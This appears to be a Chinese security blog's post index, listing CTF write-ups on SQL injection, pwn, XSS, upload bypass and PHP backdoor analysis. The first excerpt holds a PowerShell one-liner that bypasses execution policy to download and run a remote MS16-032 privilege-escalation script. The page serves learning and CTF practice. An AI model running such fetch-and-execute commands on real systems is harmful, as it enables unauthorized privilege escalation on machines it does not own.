- 博客(17)
- 收藏
- 关注
RSS订阅原创 MS16-023提权 + 信息收集 + 静默WinPcap安装 + WinDump抓包
0x01 MS16-023提权powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invok...
2019-08-01 21:08:56
1526
原创 C++基础学习(1)
0x01 关于工程1.1 工程框架创建MFC工程,可选择界面:对话框、单文档、多文档、多顶级文档详情:https://www.cnblogs.com/hao-hong-sheng/p/8513280.html1.2 添加控件在资源视图打开对话框节点,从工具箱中拖入新增控件后,vs会将新控件自动添加到Resource.h中定义。但在cpp中还显示不出新添加控件的ID...
2019-07-23 09:05:33
381
原创 SQL花式延时/布尔注入与PHP白名单函数利用方法
0x01 冗长的前奏: 来源于两道CTF题目,引发自闭中的一点点思考。 想中止这一切菜鸡的挣扎。(顺便分享一篇大佬的SQL注入文章https://blog.csdn.net/nzjdsds/article/details/86767711)0x02 CTF中的强行时间盲注2-1题目情况:2-2题目思路 先尝试常规方法...
2019-04-26 01:50:05
1212
原创 【CTF】关于SQL盲注的细节
目录:0x01 CTF题目中关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引号及相关问题0x02 某简单题目中关于order by利用排序布尔盲注题目及源码0x03 某CTF题解,盲注+泄露+反序列化 0x01 CTF题目中关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引...
2018-11-29 17:32:23
2565
原创 【无线安全1】HackRF接收广播
0x01 环境问题 用提供的ubuntu14 iso载入vm虚拟机没搞定,hackrf_info基本信息查看不成功错误-1000。 只好自己在Kali2017 x64上搭建环境,只需要安装GNU radio companion、gqrx,但进入gnuradio发现没有osmosdr模块。 (进入图形化gnuradio命令是 gnuradio-companion),所以重新安...
2018-11-15 00:02:08
3988
原创 网鼎杯第三场总结(关于parse_url、JWT生成token、python注入)
例行说明: 比赛过去很久了,才勉强有精力总结一下用到的知识点,主要是关于wp中一笔带过,讲的比较模糊的三个方面总结下。 0x01 comein题目关于parse_url函数漏洞(其实只是使用不当)题目:ini_set("display_errors",0);$uri = $_SERVER['REQUEST_URI'];if(stripos($uri,".")){ ...
2018-10-10 23:21:44
2047
原创 网鼎杯第二场 wafupload详解
0x00 有些wp里比较简略的内容,略做些分析,顺便记录点学到的姿势 0x01 wafupload先放源码,标了几处重点。详细分析一下代码第一个判断MIME就是content-type是不是image/jpeg,在burp中抓包直接改掉即可。第二个判断比较关键,判断扩展名是否是jpg、png、gif 问题出在代码是如何获取扩展名的。1、首先,文件被上传时,判...
2018-08-26 23:53:57
1872
原创 PHP混淆后门解剖分析(反抓流量、加密结果)
开始前的例行叨叨:这个后门样本收集于2018红帽杯线下决赛,看到有其他分析收集于自己的服务器,悲剧了(手动笑哭),貌似蓝帽杯也有。调试了很久,被逼着专门学了...
2018-06-09 20:08:57
2431
原创 Pwn-最简单栈溢出(2018铁三云贵赛区)write函数泄露+用地址跳回重执行主函数
开始前的例行叨叨:这大概是最简单的pwn题了吧,直接溢出的。主要是记录下write函数泄露动态地址的姿势,还有程序执行完一次就退出了,如何在溢出的末尾让它重执行,以及从lic中提取地址的姿势。...
2018-05-16 22:49:23
4551
9
原创 SQL二阶注入写shell问题——Joomla3.8.2漏洞为例
开始前的例行叨叨:参考大佬文章 http://www.sohu.com/a/223945381_354899发现仅到报错注入一步就没了下文,记录一下最终写马的姿势。复现过程:Joomla官网特别良心,各种历史版本随便下载由于复现CVE-2018-6376漏洞,所以下载了3.8.2版本,一路安装好。由于注入点在用户后台,改资料时,复现必须允许用户注册,而且能进自己后台。所以网站建好先用admin账户...
2018-05-10 00:52:47
1214
原创 Pwn-CTF 2018红帽杯redhat GameServer题目writeup
开始前的例行叨叨:学pwn萌新,欢迎交流赐教~先放一波题目:我传了github上 pwn2就是题目了。( 若有侵权,请博客留言立马删除)https://github.com/staticStr/ForCTF/blob/master/pwn2来看看这个程序是做什么用的功能很简单,输入名字,职业,就会问你是否要修改,填Y修改,写一个新的进去。ida打开分析一波,顺手把变量名能改就改了,分析看图吧。开始...
2018-05-06 00:21:33
1754
原创 从源码编译SqlCipher并修改代码实现c++中调用dll解密微信数据库
开始前的例行叨叨:被折磨很久了...orz。如果只想解密微信数据库看看大概内容,不需要看这篇重编译sqlcipher!!本篇是为了导出dll实现自定的搞基呸,高级功能。背景知识:1、手机root后才能在手机微信目录下找到uuid算出微信数据库密码。2、安卓微信数据库是sqlite数据库,被sqlcipher加密。数据库文件EnMicroMsg.db已从root过的手机中获取。3、sqlcipher...
2018-05-04 00:42:41
3248
3
原创 python打包exe后https找不到cacert.pem证书解决方法
背景:程序中引用了requests库,用requests库发送了https请求,一切正常但用Py2exe打包成exe后,报错:IOError: Could not find a suitable TLS CA certificate bundle, invalid path: D:\xxxxx\dist\library.zip\certifi\cacert.pem打包所使用的代码:from dis...
2018-04-25 18:27:03
5578
1
原创 2018HitbCTF 萌新的upload题目writeup
开始前的例行叨叨:被虐到怀疑人生,比赛群加了不少,题没做出来,签到倒是越来越专业了。记录下比赛后两小时才做出来的最简单web题upload。记录下尝试过的姿势。题目介绍:根目录下:/system/ 403/admin/ 403/upload/ 403/upfile/ 403还有某个需要寻找的目录文件:/index.html/flag.php/upload.php/pic.ph...
2018-04-14 17:56:42
1839
原创 别人家的Python代码——记录一些容易忘的姿势
开始前的例行叨叨:长期记录一些别人脚本里看到的,提升效率的姿势,容易忘记的用法。【字符类】一、生成字符串在需要爆破的时候,不需要手打字符集。>>> import string>>> string.letters'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'...
2018-04-10 18:40:06
329
原创 XSS学习整理——0ctf和一只皮卡丘的死磕
开始前的例行叨叨:这次记录的是20180ctf的web题,名字不重要了,我只记得那只页面上的皮卡丘。到比赛结束没有做出来!!在坐等wp,以后会更新。一、题目分析(熟悉题目的大佬就跳过吧)1、登录界面 /game/index.php注册和登录界面都是这一个,账号名不能特殊符号,验证码复制上到Python里直接跑即可。不登录,则不能进入主界面,不能看用户的profile简介,直接进入会被跳转:http...
2018-04-02 19:05:40
2185
9
原创 gdb-peda调试pwnable.kr题目random
题目pwnable.kr——6.random各种技术文章开始前的例行叨叨:pwnable.kr是CTF—pwn类型题目学习网站,对其中第6题random解题过程做一份记录。本萌新菜鸡刚接触pwn,顺手做记录,欢迎指正讨论。源码:文件【random.c】#include <stdio.h>int main(){ unsigned int random; random = rand...
2018-03-30 19:28:08
1814
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人